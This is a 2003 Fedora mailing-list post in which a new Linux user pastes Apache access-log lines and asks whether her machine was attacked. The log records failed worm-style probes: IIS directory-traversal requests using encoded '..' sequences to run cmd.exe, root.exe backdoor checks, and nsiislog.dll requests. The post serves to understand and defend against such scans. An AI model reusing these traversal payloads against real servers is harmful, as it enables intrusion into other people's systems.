attacked? hacked? help.....!

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



I am very new to Linux but was poking around in my newly setup Fedora Core 1 system today and came upon the lines below in the Apache Access Log when I used the "System Logs" icon in the System Tools Menu.

Is the IP at the beginning of each line the IP that requested the file that is shown at the end of the line? with the date and time in the center? If this isn't what's shown in this file, what is this format? What does this file tell me? Am I paranoid, or was someone trying to access my machine (but ignorantly assuming it was a Windows machine)?


quoted Apaches Access Log:

24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:49 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:49 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:52 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:56 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:56 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:17 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:18 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:18 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:19 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:19 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
211.239.107.43 - - [07/Dec/2003:15:40:29 -0600] "GET /scripts/nsiislog.dll" 404 331 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
217.120.149.161 - - [07/Dec/2003:18:27:17 -0600] "GET /scripts/nsiislog.dll" 404 331 "-" "-"


----------------------------------------

Thanks,
Lisa




[Index of Archives]     [Current Fedora Users]     [Fedora Desktop]     [Fedora SELinux]     [Yosemite News]     [Yosemite Photos]     [KDE Users]     [Fedora Tools]     [Fedora Docs]

  Powered by Linux